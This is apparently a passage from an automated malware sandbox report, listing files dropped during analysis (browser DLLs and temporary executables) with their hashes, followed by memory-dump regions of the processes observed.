SHA5128a851417a8abe971d682cc8a4bd20640998c552b28abea8d03b21735b126d62622ccb7457aa9e725aa5959f0f1b5f2da2edd51fe559983a916f8ec03251eddb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5687ff3bb8a8b15736d686119a681097c
SHA118f43aa14e56d4fb158a8804f79fc3c604903991
SHA25651fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5609bf5d098fee211770ed9632f1f59ab
SHA1104c4d9474ed5fa3226c443e501b8cce9b4ce2a4
SHA256b7c21def9de88c59a8628b30d0bae9aeb9d97150ef24148477c33127777b68cc
SHA5121f60be4b263328a66f44230505048dd5da39b6cf61bf4daa64d4a79642382e6f03f364b7afa62b64aa706e2f6a035bf4f02fc4decdf200ccc113c8c77f266848
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5300309b08381bc2e8166339653399b53
SHA17752c3940b7b566611f0b17ee823da89c7feedd2
SHA2565147bfcb83bc1567e8270773b74f4ce1a4a58fb2eda745542a251639e92f6864
SHA512df94a3097ce4a8f7186ee81ab9cf6022bf429f59ff96f3425ac16cfc1d9c2bd4b4ebc0a3d9d6fd5f6d8bc9e26a569a8c7694968e155ac73d34eec3909e867dcd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5300309b08381bc2e8166339653399b53
SHA17752c3940b7b566611f0b17ee823da89c7feedd2
SHA2565147bfcb83bc1567e8270773b74f4ce1a4a58fb2eda745542a251639e92f6864
SHA512df94a3097ce4a8f7186ee81ab9cf6022bf429f59ff96f3425ac16cfc1d9c2bd4b4ebc0a3d9d6fd5f6d8bc9e26a569a8c7694968e155ac73d34eec3909e867dcd
-
C:\Users\Admin\AppData\Local\Temp\774C0CC0\mozglue.dllFilesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
C:\Users\Admin\AppData\Local\Temp\774C0CC0\msvcp140.dllFilesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\Users\Admin\AppData\Local\Temp\774C0CC0\nss3.dllFilesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
C:\Users\Admin\AppData\Local\Temp\774C0CC0\vcruntime140.dllFilesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exeFilesize
3.4MB
MD598d5ab6991c6fc569e5c90a6241633d9
SHA144990ac5227ea16bbdf9d0b20cf94b738932ec66
SHA25677f039ea715bd52715f66a7f11c8214b4b8e809faf837115daafca1a2e166cc5
SHA51249a4e316517b4ce197a1bbcf812244a002887edbb60ad184209fc6b9d91ae62007658afccdd1770826c2af326f254849c23d1853cf051ab55650d93c5b0eb7a3
-
C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exeFilesize
3.4MB
MD598d5ab6991c6fc569e5c90a6241633d9
SHA144990ac5227ea16bbdf9d0b20cf94b738932ec66
SHA25677f039ea715bd52715f66a7f11c8214b4b8e809faf837115daafca1a2e166cc5
SHA51249a4e316517b4ce197a1bbcf812244a002887edbb60ad184209fc6b9d91ae62007658afccdd1770826c2af326f254849c23d1853cf051ab55650d93c5b0eb7a3
-
C:\Users\Admin\AppData\Local\Temp\BCC8.tmp.exeFilesize
3.4MB
MD598d5ab6991c6fc569e5c90a6241633d9
SHA144990ac5227ea16bbdf9d0b20cf94b738932ec66
SHA25677f039ea715bd52715f66a7f11c8214b4b8e809faf837115daafca1a2e166cc5
SHA51249a4e316517b4ce197a1bbcf812244a002887edbb60ad184209fc6b9d91ae62007658afccdd1770826c2af326f254849c23d1853cf051ab55650d93c5b0eb7a3
-
C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exeFilesize
2.7MB
MD5f59f5f3f89c71811be2512ee230c3790
SHA1abe340c34343ecbc67a848de74d98b105876f5ea
SHA2568edc968a3a55ab036afc00566ac740afbfde2e40ca948e7f49c35861730abcc6
SHA5121f323b0b12ae597bf7bc339cd3839aa46f5a9eba1b841b09ceb7874693efebc7b0c9983d71c54f525e86672b9be0ce325c05d6281f042bd5017e2531d7068f1b
-
C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exeFilesize
2.7MB
MD5f59f5f3f89c71811be2512ee230c3790
SHA1abe340c34343ecbc67a848de74d98b105876f5ea
SHA2568edc968a3a55ab036afc00566ac740afbfde2e40ca948e7f49c35861730abcc6
SHA5121f323b0b12ae597bf7bc339cd3839aa46f5a9eba1b841b09ceb7874693efebc7b0c9983d71c54f525e86672b9be0ce325c05d6281f042bd5017e2531d7068f1b
-
C:\Users\Admin\AppData\Local\Temp\C4C8.tmp.exeFilesize
2.7MB
MD5f59f5f3f89c71811be2512ee230c3790
SHA1abe340c34343ecbc67a848de74d98b105876f5ea
SHA2568edc968a3a55ab036afc00566ac740afbfde2e40ca948e7f49c35861730abcc6
SHA5121f323b0b12ae597bf7bc339cd3839aa46f5a9eba1b841b09ceb7874693efebc7b0c9983d71c54f525e86672b9be0ce325c05d6281f042bd5017e2531d7068f1b
-
C:\Users\Admin\AppData\Local\Temp\C805.tmp.exeFilesize
665KB
MD5e0e3613d55dc4d1a6b689f36f701a743
SHA1cb59ff5da37429d5e49cbdff2a45ed9b5168fe96
SHA256c77f4cc5835df24b58246a328604bb5e36b4f1861789ce256f0f75d0fbfe1ce6
SHA5128a9293db7ad4962817b58602409c39e0c900a14ac0bd690983bba82e361cc35827eeb072818ce608b3b10a62429d30814ccdf0927df63e9570d65ae50fb9322e
-
C:\Users\Admin\AppData\Local\Temp\C805.tmp.exeFilesize
665KB
MD5e0e3613d55dc4d1a6b689f36f701a743
SHA1cb59ff5da37429d5e49cbdff2a45ed9b5168fe96
SHA256c77f4cc5835df24b58246a328604bb5e36b4f1861789ce256f0f75d0fbfe1ce6
SHA5128a9293db7ad4962817b58602409c39e0c900a14ac0bd690983bba82e361cc35827eeb072818ce608b3b10a62429d30814ccdf0927df63e9570d65ae50fb9322e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_brgpykxg.4cs.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/832-269-0x00000241066C0000-0x0000024107181000-memory.dmpFilesize
10.8MB
-
memory/832-253-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-254-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-252-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-260-0x00000241066C0000-0x0000024107181000-memory.dmpFilesize
10.8MB
-
memory/832-262-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-263-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-264-0x0000024106310000-0x0000024106320000-memory.dmpFilesize
64KB
-
memory/832-272-0x00000241066C0000-0x0000024107181000-memory.dmpFilesize
10.8MB
-
memory/1488-171-0x0000000005370000-0x0000000005380000-memory.dmpFilesize
64KB
-
memory/1488-145-0x0000000005BF0000-0x0000000005C12000-memory.dmpFilesize
136KB
-
memory/1488-144-0x0000000005370000-0x0000000005380000-memory.dmpFilesize
64KB
-
memory/1488-143-0x00000000008D0000-0x0000000000BA0000-memory.dmpFilesize
2.8MB
-
memory/1668-200-0x0000000000F80000-0x0000000000F9A000-memory.dmpFilesize
104KB
-
memory/1668-204-0x0000000000FB0000-0x0000000000FB2000-memory.dmpFilesize
8KB
-
memory/1668-179-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-181-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-183-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-209-0x0000000000F60000-0x0000000000F7C000-memory.dmpFilesize
112KB
-
memory/1668-208-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-184-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-185-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1668-190-0x0000000000F60000-0x0000000000F7C000-memory.dmpFilesize
112KB
-
memory/1668-199-0x0000000000F60000-0x0000000000F7C000-memory.dmpFilesize
112KB
-
memory/1668-201-0x0000000002AB0000-0x0000000003AB0000-memory.dmpFilesize
16.0MB
-
memory/1668-202-0x0000000000F60000-0x0000000000F7C000-memory.dmpFilesize
112KB
-
memory/2024-207-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-205-0x000001D761720000-0x000001D761727000-memory.dmpFilesize
28KB
-
memory/2024-210-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-211-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-203-0x000001D761600000-0x000001D761601000-memory.dmpFilesize
4KB
-
memory/2024-212-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-206-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-213-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2024-257-0x00007FF486E90000-0x00007FF486F8A000-memory.dmpFilesize
1000KB
-
memory/2096-339-0x000001D949910000-0x000001D94991A000-memory.dmpFilesize
40KB
-
memory/2096-338-0x000001D9497B0000-0x000001D9497CC000-memory.dmpFilesize
112KB
-
memory/2096-306-0x000001D9494E0000-0x000001D9494F0000-memory.dmpFilesize
64KB
-
memory/2096-340-0x000001D949920000-0x000001D949928000-memory.dmpFilesize
32KB
-
memory/2096-311-0x000001D9494E0000-0x000001D9494F0000-memory.dmpFilesize
64KB
-
memory/2096-341-0x000001D949930000-0x000001D94993A000-memory.dmpFilesize
40KB
-
memory/2096-345-0x00007FF4412F0000-0x00007FF441300000-memory.dmpFilesize
64KB
-
memory/2096-302-0x000001D9494E0000-0x000001D9494F0000-memory.dmpFilesize
64KB
-
memory/2252-217-0x0000024C85F70000-0x0000024C862D4000-memory.dmpFilesize
3.4MB
-
memory/2252-218-0x0000024CA0890000-0x0000024CA08A0000-memory.dmpFilesize
64KB
-
memory/2252-258-0x0000024CA0890000-0x0000024CA08A0000-memory.dmpFilesize
64KB
-
memory/2252-219-0x0000024C86710000-0x0000024C86732000-memory.dmpFilesize
136KB
-
memory/2580-259-0x0000000000400000-0x00000000004B0000-memory.dmpFilesize
704KB
-
memory/2580-228-0x00000000022C0000-0x00000000022EC000-memory.dmpFilesize
176KB
-
memory/2580-251-0x0000000002150000-0x0000000002151000-memory.dmpFilesize
4KB
-
memory/2856-322-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-346-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-1477-0x0000024EDFD40000-0x0000024EDFD50000-memory.dmpFilesize
64KB
-
memory/2856-356-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-354-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-352-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-350-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-348-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-286-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-285-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-273-0x0000000000400000-0x00000000004A8000-memory.dmpFilesize
672KB
-
memory/2856-288-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-299-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-320-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-343-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-328-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-326-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-307-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-310-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-324-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-313-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-308-0x0000024EDFD40000-0x0000024EDFD50000-memory.dmpFilesize
64KB
-
memory/2856-303-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-315-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/2856-318-0x0000024EDF9A0000-0x0000024EDFA78000-memory.dmpFilesize
864KB
-
memory/3400-223-0x0000000000720000-0x00000000009E2000-memory.dmpFilesize
2.8MB
-
memory/3400-261-0x00000000051C0000-0x00000000051D0000-memory.dmpFilesize
64KB
-
memory/3400-225-0x00000000051C0000-0x00000000051D0000-memory.dmpFilesize
64KB
-
memory/4456-284-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4456-581-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4456-304-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4456-280-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4908-265-0x0000000002A20000-0x0000000002A30000-memory.dmpFilesize
64KB
-
memory/4908-266-0x0000000002A20000-0x0000000002A30000-memory.dmpFilesize
64KB
-
memory/4908-256-0x0000000002A20000-0x0000000002A30000-memory.dmpFilesize
64KB
-
memory/4908-255-0x0000000002A20000-0x0000000002A30000-memory.dmpFilesize
64KB
-
memory/5104-151-0x00000000061D0000-0x0000000006236000-memory.dmpFilesize
408KB
-
memory/5104-150-0x00000000058F0000-0x0000000005956000-memory.dmpFilesize
408KB
-
memory/5104-161-0x00000000068B0000-0x00000000068CE000-memory.dmpFilesize
120KB
-
memory/5104-173-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB
-
memory/5104-162-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB
-
memory/5104-163-0x0000000007F00000-0x000000000857A000-memory.dmpFilesize
6.5MB
-
memory/5104-164-0x0000000006DA0000-0x0000000006DBA000-memory.dmpFilesize
104KB
-
memory/5104-147-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB
-
memory/5104-149-0x0000000005AF0000-0x0000000006118000-memory.dmpFilesize
6.2MB
-
memory/5104-148-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB
-
memory/5104-146-0x0000000002F00000-0x0000000002F36000-memory.dmpFilesize
216KB
-
memory/5104-174-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB
-
memory/5104-172-0x0000000001630000-0x0000000001640000-memory.dmpFilesize
64KB